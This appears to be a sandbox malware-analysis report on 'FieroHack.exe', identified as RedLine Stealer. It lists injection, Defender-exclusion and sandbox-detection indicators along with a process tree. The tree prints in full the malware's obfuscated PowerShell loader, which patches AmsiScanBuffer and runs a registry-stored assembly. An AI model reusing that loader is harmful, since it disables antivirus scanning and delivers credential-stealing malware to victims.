Analysis
max time kernel: 34s
max time network: 44s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14/07/2024, 17:00
Static task: static1
Behavioral task: behavioral1
Sample: Midnight/FieroHack.exe
Resource: win10v2004-20240709-en
General
Target: Midnight/FieroHack.exe
Size: 785.9MB
MD5: 22b9dcd226abe95a3fbe7a02030a5d2b
SHA1: 399db7ceeeca571804ead588f56fbe5351bc87a2
SHA256: b06b787c071c1bc7fb71d6d47c16e439a75e2e43421f5ad9dc4f66dd04b1aa53
SHA512: 5661b354a82a69d8aa1b3dfb299cb1ef0893f97402bf6392046b8c4f618da73fc1686bfd0487a78163527df23229de4d96605a29457ba61c892e27ecc9db454a
SSDEEP: 98304:k4cScEqJJRoXw4MzFHjLu/Lfyu6akwy/:LcywSqjLGNkX
Malware Config
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload (1 IoC)
  resource                                                              yara_rule
  behavioral1/memory/1792-26-0x0000000000A50000-0x0000000000ABA000-memory.dmp  family_redline
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description            pid   Process         procid_target
  PID 4528 created 612   4528  powershell.EXE  5
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid   Process
  516   powershell.exe
Creates new service(s) (2 TTPs)
Executes dropped EXE (3 IoCs)
  pid   Process
  1568  WeMod.exe
  1792  Sirus.exe
  3952  ritphyfejjmj.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Power Settings (1 TTP, 4 IoCs)
powercfg controls all configurable power settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
  pid   Process
  3564  powercfg.exe
  2296  powercfg.exe
  4636  powercfg.exe
  4760  powercfg.exe
Drops file in System32 directory (5 IoCs)
  description                   ioc                                                                                                              Process
  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx                          svchost.exe
  File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx                            svchost.exe
  File opened for modification  C:\Windows\system32\MRT.exe                                                                                      WeMod.exe
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.EXE
  File created                  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log             powershell.EXE
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  pid   Process
  1568  WeMod.exe
Suspicious use of SetThreadContext (2 IoCs)
  description                          pid   Process         procid_target
  PID 1568 set thread context of 4628  1568  WeMod.exe       111
  PID 4528 set thread context of 1008  4528  powershell.EXE  130
Launches sc.exe (9 IoCs)
sc.exe is a Windows utility to control services on the system.
  pid   Process
  1920  sc.exe
  1004  sc.exe
  4816  sc.exe
  2172  sc.exe
  3000  sc.exe
  3056  sc.exe
  2252  sc.exe
  4532  sc.exe
  3100  sc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
  pid   pid_target  Process       procid_target
  556   1792        WerFault.exe  85
Checks SCSI registry key(s) (3 TTPs, 18 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  description        ioc                                                                                                             Process
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs  wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc     wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs       wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg                 wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags         wmiprvse.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000                wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags    wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName   wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID          wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName        wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service             wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID     wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg            wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service        wmiprvse.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf        wmiprvse.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000                     wmiprvse.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc          wmiprvse.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf             wmiprvse.exe
Modifies data under HKEY_USERS (41 IoCs)
All entries: description "Key created", Process powershell.EXE.
  ioc
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates
  \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Consecutive identical rows are collapsed; the entry counts sum to 64.
  pid   Process         entries
  1568  WeMod.exe       2
  1792  Sirus.exe       29
  1568  WeMod.exe       1
  516   powershell.exe  2
  1568  WeMod.exe       13
  4528  powershell.EXE  2
  1568  WeMod.exe       3
  4528  powershell.EXE  1
  1008  dllhost.exe     11
Suspicious use of AdjustPrivilegeToken (55 IoCs)
  description                           pid   Process
  Token: SeDebugPrivilege               1792  Sirus.exe
  Token: SeBackupPrivilege              1792  Sirus.exe
  Token: SeSecurityPrivilege            1792  Sirus.exe
  Token: SeSecurityPrivilege            1792  Sirus.exe
  Token: SeSecurityPrivilege            1792  Sirus.exe
  Token: SeSecurityPrivilege            1792  Sirus.exe
  Token: SeDebugPrivilege               516   powershell.exe
  Token: SeShutdownPrivilege            3564  powercfg.exe
  Token: SeCreatePagefilePrivilege      3564  powercfg.exe
  Token: SeShutdownPrivilege            4636  powercfg.exe
  Token: SeCreatePagefilePrivilege      4636  powercfg.exe
  Token: SeShutdownPrivilege            2296  powercfg.exe
  Token: SeCreatePagefilePrivilege      2296  powercfg.exe
  Token: SeShutdownPrivilege            4760  powercfg.exe
  Token: SeCreatePagefilePrivilege      4760  powercfg.exe
  Token: SeDebugPrivilege               4528  powershell.EXE
  Token: SeDebugPrivilege               4528  powershell.EXE
  Token: SeDebugPrivilege               1008  dllhost.exe
  Token: SeAuditPrivilege               2060  svchost.exe
  Token: SeAssignPrimaryTokenPrivilege  2412  svchost.exe
  Token: SeIncreaseQuotaPrivilege       2412  svchost.exe
  Token: SeSecurityPrivilege            2412  svchost.exe
  Token: SeTakeOwnershipPrivilege       2412  svchost.exe
  Token: SeLoadDriverPrivilege          2412  svchost.exe
  Token: SeSystemtimePrivilege          2412  svchost.exe
  Token: SeBackupPrivilege              2412  svchost.exe
  Token: SeRestorePrivilege             2412  svchost.exe
  Token: SeShutdownPrivilege            2412  svchost.exe
  Token: SeSystemEnvironmentPrivilege   2412  svchost.exe
  Token: SeUndockPrivilege              2412  svchost.exe
  Token: SeManageVolumePrivilege        2412  svchost.exe
  (the preceding block of 12 rows for PID 2412 svchost.exe appears three times in the report, giving 36 rows for that process and 55 rows in total)
Suspicious use of WriteProcessMemory (64 IoCs)
Consecutive identical rows are collapsed; the entry counts sum to 64.
  description                       pid   Process         procid_target  entries
  PID 1172 wrote to memory of 1568  1172  FieroHack.exe   84             2
  PID 1172 wrote to memory of 1792  1172  FieroHack.exe   85             3
  PID 1100 wrote to memory of 4292  1100  cmd.exe         99             2
  PID 1568 wrote to memory of 4628  1568  WeMod.exe       111            6
  PID 372 wrote to memory of 3652   372   cmd.exe         129            2
  PID 4528 wrote to memory of 1008  4528  powershell.EXE  130            8
  PID 1008 wrote to memory of 612   1008  dllhost.exe     5              1
  PID 1008 wrote to memory of 688   1008  dllhost.exe     7              1
  PID 1008 wrote to memory of 964   1008  dllhost.exe     12             1
  PID 1008 wrote to memory of 384   1008  dllhost.exe     13             1
  PID 1008 wrote to memory of 764   1008  dllhost.exe     14             1
  PID 1008 wrote to memory of 1048  1008  dllhost.exe     15             1
  PID 1008 wrote to memory of 1072  1008  dllhost.exe     17             1
  PID 1008 wrote to memory of 1108  1008  dllhost.exe     18             1
  PID 1008 wrote to memory of 1220  1008  dllhost.exe     19             1
  PID 1008 wrote to memory of 1236  1008  dllhost.exe     20             1
  PID 1008 wrote to memory of 1332  1008  dllhost.exe     21             1
  PID 1008 wrote to memory of 1356  1008  dllhost.exe     22             1
  PID 1008 wrote to memory of 1380  1008  dllhost.exe     23             1
  PID 1008 wrote to memory of 1396  1008  dllhost.exe     24             1
  PID 1008 wrote to memory of 1408  1008  dllhost.exe     25             1
  PID 1008 wrote to memory of 1532  1008  dllhost.exe     26             1
  PID 1008 wrote to memory of 1608  1008  dllhost.exe     27             1
  PID 1008 wrote to memory of 1616  1008  dllhost.exe     28             1
  PID 1008 wrote to memory of 1676  1008  dllhost.exe     29             1
  PID 1008 wrote to memory of 1696  1008  dllhost.exe     30             1
  PID 1008 wrote to memory of 1800  1008  dllhost.exe     31             1
  PID 1008 wrote to memory of 1856  1008  dllhost.exe     32             1
  PID 1008 wrote to memory of 1880  1008  dllhost.exe     33             1
  PID 1008 wrote to memory of 1896  1008  dllhost.exe     34             1
  PID 1008 wrote to memory of 1944  1008  dllhost.exe     35             1
  PID 1008 wrote to memory of 1952  1008  dllhost.exe     36             1
  PID 1008 wrote to memory of 2044  1008  dllhost.exe     37             1
  PID 1008 wrote to memory of 2060  1008  dllhost.exe     39             1
  PID 1008 wrote to memory of 2160  1008  dllhost.exe     40             1
  PID 1008 wrote to memory of 2372  1008  dllhost.exe     41             1
  PID 1008 wrote to memory of 2380  1008  dllhost.exe     42             1
  PID 1008 wrote to memory of 2412  1008  dllhost.exe     43             1
  PID 1008 wrote to memory of 2528  1008  dllhost.exe     44             1
  PID 1008 wrote to memory of 2604  1008  dllhost.exe     45             1
  PID 1008 wrote to memory of 2620  1008  dllhost.exe     46             1
  PID 1008 wrote to memory of 2648  1008  dllhost.exe     47             1
  PID 1008 wrote to memory of 2656  1008  dllhost.exe     48             1
  PID 1008 wrote to memory of 2664  1008  dllhost.exe     49             1
  PID 1008 wrote to memory of 2776  1008  dllhost.exe     50             1
  PID 1008 wrote to memory of 3020  1008  dllhost.exe     51             1
  PID 1008 wrote to memory of 3036  1008  dllhost.exe     52             1
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(indented entries are child processes of the entry above them; each entry lists the image path, PID, command line and the signatures triggered by that process)

C:\Windows\system32\winlogon.exe (PID 612)
  cmdline: winlogon.exe
    C:\Windows\system32\dwm.exe (PID 384)
      cmdline: "dwm.exe"
    C:\Windows\System32\dllhost.exe (PID 1008)
      cmdline: C:\Windows\System32\dllhost.exe /Processid:{38e485ca-1e5b-4733-b4f1-d58be1db2064}
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
C:\Windows\system32\lsass.exe (PID 688)
  cmdline: C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe (PID 964)
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe (PID 764)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe (PID 1048)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe (PID 1072)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe (PID 1108)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe (PID 1220)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  signatures: Drops file in System32 directory
C:\Windows\system32\svchost.exe (PID 1236)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    C:\Windows\system32\taskhostw.exe (PID 3020)
      cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 4528)
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cNcnQVhxXBEh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iCtVghdmcFyLby,[Parameter(Position=1)][Type]$IkEMAyneRy)$rDTIwunPoVL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+'o'+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+[Char](116)+'e'+'T'+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$rDTIwunPoVL.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'cia'+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iCtVghdmcFyLby).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rDTIwunPoVL.DefineMethod('Inv'+'o'+''+[Char](107)+''+'e'+'',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+','+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$IkEMAyneRy,$iCtVghdmcFyLby).SetImplementationFlags('R'+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $rDTIwunPoVL.CreateType();}$vGqSmXGKySoOj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+'e'+[Char](77)+'e'+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$ztZIOpccyIrfwn=$vGqSmXGKySoOj.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+'c'+[Char](65)+''+[Char](100)+'dr'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MPTgtmUVeRAUzqqwJsh=cNcnQVhxXBEh @([String])([IntPtr]);$jFhSlGhDRvnVCFJCeDoamd=cNcnQVhxXBEh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EOtOBjeKLpK=$vGqSmXGKySoOj.GetMethod('G'+'e'+'tM'+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'nd'+'l'+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'')));$SpCEjEOuMmLFaP=$ztZIOpccyIrfwn.Invoke($Null,@([Object]$EOtOBjeKLpK,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+'br'+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$fexXYfSNqUsqKzZTY=$ztZIOpccyIrfwn.Invoke($Null,@([Object]$EOtOBjeKLpK,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$EhFPjhT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SpCEjEOuMmLFaP,$MPTgtmUVeRAUzqqwJsh).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$jtXMiYlNszqMyPqZI=$ztZIOpccyIrfwn.Invoke($Null,@([Object]$EhFPjhT,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$elnOOPjNcL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fexXYfSNqUsqKzZTY,$jFhSlGhDRvnVCFJCeDoamd).Invoke($jtXMiYlNszqMyPqZI,[uint32]8,4,[ref]$elnOOPjNcL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jtXMiYlNszqMyPqZI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fexXYfSNqUsqKzZTY,$jFhSlGhDRvnVCFJCeDoamd).Invoke($jtXMiYlNszqMyPqZI,[uint32]8,0x20,[ref]$elnOOPjNcL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'FT'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+''+'s'+'t'+'a'+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
      signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        C:\Windows\System32\Conhost.exe (PID 1636)
          cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe (PID 1332)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe (PID 1356)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe (PID 1380)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe (PID 1396)
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe (PID 1408)
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe (PID 1532)
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe (PID 1608)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe (PID 1616)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
    C:\Windows\system32\sihost.exe (PID 2664)
      cmdline: sihost.exe
C:\Windows\System32\svchost.exe (PID 1676)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe (PID 1696)
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe (PID 1800)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe (PID 1856)
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe (PID 1880)
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe (PID 1896)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe (PID 1944)
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe (PID 1952)
  cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe (PID 2044)
  cmdline: C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe (PID 2060)
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
  signatures: Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\svchost.exe (PID 2160)
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe (PID 2372)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe (PID 2380)
  cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe (PID 2412)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  signatures: Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe (PID 2528)
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe (PID 2604)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe (PID 2620)
  cmdline: C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe (PID 2648)
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe (PID 2656)
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe (PID 2776)
